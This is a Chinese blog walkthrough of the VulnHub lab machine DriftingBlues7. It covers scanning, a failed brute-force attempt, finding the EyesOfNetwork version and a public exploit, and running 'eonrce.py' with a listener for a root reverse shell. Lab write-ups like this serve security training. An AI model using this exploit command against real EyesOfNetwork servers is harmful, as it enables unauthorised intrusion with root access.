vulnhub 之driftingblues7_vh

目录

 

信息搜集

扫描网段

扫描IP地址

扫描网站目录

查看网站

发现漏洞

GETSHELL

总结


信息搜集

扫描网段

发现网站真实IP

扫描IP地址

发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点)

扫描网站目录

dirsearch -u https://192.168.179.137/ 

虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透来说有时候真的就是细节决定成败~)

查看网站

还是要去网站看一看看能不能找到一些有用的信息

 

首先映入眼帘的就是一个大大的登录框,我首先想到的就是暴力破解,然后右键查看源代码,又发现了一些信息,随即使用cewl工具爬取这些敏感信息,生成字典,bp抓包,暴力破解一气呵成。

然而很尴尬的是并没有什么用没爆出来,我能怎么办,只能从头来过

回到登录页面,发现正中间的EyesOfNetwork,百度搜索一下,发现好像是一个管理平台(其实我还搜了搜有没有默认密码,并没有得逞)

漏洞基本上都是基于版本来的,可能早期版本有后期就修复了。所以版本信息很重要,没有版本信息只能一个一个的去试太过于浪费时间

只好重新去源代码页面查看一些信息,源代码页面有很多链接,就一个个的点开看了看在一个不起眼的链接中发现了,版本信息!!!!

发现漏洞

然后就平台+版本号百度一波

 

但是,还是没有搜到。俺能怎么办,俺也没有办法啊~,有趣的是GitHub在我两次搜索的时候都出现了,我一开始还点进去了,进去是项目信息。项目信息?! 突然想到可以在github上直接搜exp

平台名+版本+exp

没有关系,我已经习惯了。既然这个版本没有那我不加版本总行了吧

终于啊兄弟们 终于啊

我这里就不放链接了,大家可以自己去搜一下试试。我觉得这个搜索的时候也是一种思路,这个不行就在换一个嘛(主要就是不要轻易放弃,各种姿势都要尝试一下 ,什么大小写啦、去掉空格之类的,别小看这些东西,有时候你格式不对就是搜不出来,还有就是尽量别用简写用全拼)

接下来就是下载exp运行就可以了

GETSHELL

首先我一开始按照它下面的运行方式运行了一些并没有成功

监听端口嘛  那我就自己开个端口被

在kali中开启端口监听

 

 

 

因为我这个端口是自己指定的所以在后面运行的时候指定一下kali的IP地址和端口号

./eonrce.py https://192.168.179.137/ -ip 192.168.179.145 -port 1234

 

当时我就直接就拿下!这还是个root权限的用户还省的我提权了

拿到flag,打完收工

 

总结

总的来说这个靶场并不是很难,主要还是因为前辈们已经为我们写好了exp,所以我们大多数操作都是在搜集信息,我记得谁说的来着,渗透测试的本质就是信息搜集(真的有人说过,但是我忘了我在哪本书上看到的了)。虽然不难但是还是花费了不少的时间,主要是测的方面很多但是很多都是无效的,虽然无效但是我们还是要去测,因为真正有效的信息几句隐藏在这些里面。还是那句话,胆大心细,别放弃,多尝试。总有一款适合你。

 

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值